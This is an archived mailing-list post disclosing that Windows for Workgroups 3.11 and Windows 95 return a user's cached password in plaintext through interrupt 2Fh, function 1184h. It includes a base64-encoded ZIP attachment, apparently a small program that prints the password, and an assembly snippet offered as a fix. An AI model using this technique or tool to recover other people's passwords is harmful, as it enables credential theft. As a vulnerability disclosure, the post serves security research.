This is a multi-part message in MIME format. ------=_NextPart_000_01BDFD47.9C3B9DE0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Lately, I've been playing a bit with net.exe program (\windows\net.exe). With this program, a user can set up the network drivers (Windows For Workgroup protocol); moreover, a user can log in (open a wfw session) and also change his password. As this program runs on DOS, I've been wondering how next.exe was retrieving the password of the user; as no DLL calls to undocumented functions are possible, only a call to a special interrupt/function should be used. Then, tracing through the code, I've found a rather interesting feature. When a user changes its password, net.exe accesses to the old password using the multiplex interrupt 2fh (or so-called software interrupt) with function 11h (sub function 84h). I suppose that function 11XX, int 2fh is installed by the windows kernel so that it can exchange data (WFW infos) with a DOS program. Well, so you would say that this function requires as input the password and returns an error if the password is bad.. but, no.. Microsoft did it the other way. The function returns the uncrypted password to a buffer (... no comment). Indeed, this is not _big_ deal but if a user has access to your computer after you logged then he can easily retrieve your password.. And I am sure that a lot of people uses the same password for their mail and their windows password (so it is somewhat a security problem). I attached a small program that prompts the password of the user (you must have logged in first); this only work on Windows for Workgroup 3.11 and Windows 95 (Windows 98 and Windows NT are not affected -hopefully-). But I wouldn't be surprised if Win98 has an undocumented function that returns the password of the user (I wouldn't bet that about NT though.) fix : well, I didn't find anything .. except that this code : mov ax, 1184h mov bx, 0dh xor cx, cx int 2fh seems to disable the password caching feature. ga ------=_NextPart_000_01BDFD47.9C3B9DE0 Content-Type: application/octet-stream; name="Cachepig.zip" Content-Transfer-Encoding: base64 Content-Description: Cachepig.zip (ZIP File) Content-Disposition: attachment; filename="Cachepig.zip" UEsDBBQAAAAIAAiLVSWmFN1EjQIAAB0IAAAMAAAAQ0FDSEVQSUcuQVNNtVVha9swEP0eyH+4b9lo EuzUC1uyjkE7xtiybJTBYIwiW2dbVJaMpazOv5+kxHZii1LK5gQ7ku893buTXtbwFbVKSImQSQ06 R0hIkiOFRD7M56AkbFhSSSVT3Y8oWTYfj9bm62aYyKAkSj3IigITUGAhqz0wBcLgiEFLauA2TEug El4oTHYV03vQhN+b+ZerI11zFfKPuZN6CmH4OsrbeVjDJVwMI2M+hQBP4mzkwheZGM4g7UV6OSmb AhHqrpXmiWRCm/vinK9Z/QrCS4j3GlVTLFmUjCOsQBBVwCyF2JRrJg91tVU1Ed3AxIxH9hMzrSBc wlOvNSyjAD7HQCitUClb+UJSHI9klQEEdRgET2VyzZOcwvx6u4HUpG8zutneAnz4/gMWYT4ebb59 +XkYDQvhZy12XLOSY20raAkVJppJAXONtZs474XphulbTITAqnt3TTi3zxumSk72PpjbGK9yD9+x u6az91kld+WQ9iPqu08ilcqPVrryoU8TpmzIuiH3eHernyHj8hEZXGZMPEtCD/n/0sdH0m/O2LMU DMH/XASpp9F1EJwosCf/ZnvrDsMBsxquT3Kj+00P5ZaxyGayQrfjm6ROeBLuEWUdLFxcLKNZ1L2s ZXVY0VSa8FPuUqB5qoSo2FMgZ2y/UK0om4W/TbbBIgpIQE9yPqbXNsKnszFqf7Y9v+15wVbwPQhE ihRSIyPmV2d7pamZc5lHXYXpiYKC1MBRZDoHmcJwbxzltIZDiSbOZJ25NFE0hkljxDCDjMBbuhMJ Ee+LfUY4zmWVvZsYadS22PW5/bWwdThzB0fXjVYwGY/OzAc0K1DBMrKRwRHuTmabTTdq4d2UD979 b1l4N2rh3VQf/hdQSwMEFAAAAAgAjopVJYqzpGPAAAAAbgEAAAwAAABDQUNIRVBJRy5DT02tjjGK wkAYRv9xSaEQxc5ysogWYhTsggSbhS3WQwxJHIMxExKC2NvoATyGTbbQbWYhhVVaD2D115YiaHKG +MoH3+P7swmakChyT3AKcke2dxwB9iD5kFeCBshLoShgC5K61CvYBflZyZUKqMARfjLtt5pp6eP0 DcP/26EzO3891Vob0uOmeWpANkgtZs2dwOW0TzmjYzv2LeZPlmvOPEcXITfVWj5YiXDBQxEH1KBQ Ek9w16cF5VsBi6L8m/2O1gtQSwECFAAUAAAACAAIi1UlphTdRI0CAAAdCAAADAAAAAAAAAABACAA AAAAAAAAQ0FDSEVQSUcuQVNNUEsBAhQAFAAAAAgAjopVJYqzpGPAAAAAbgEAAAwAAAAAAAAAAQAg AAAAtwIAAENBQ0hFUElHLkNPTVBLBQYAAAAAAgACAHQAAAChAwAAAAA= ------=_NextPart_000_01BDFD47.9C3B9DE0--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:20:30 PDT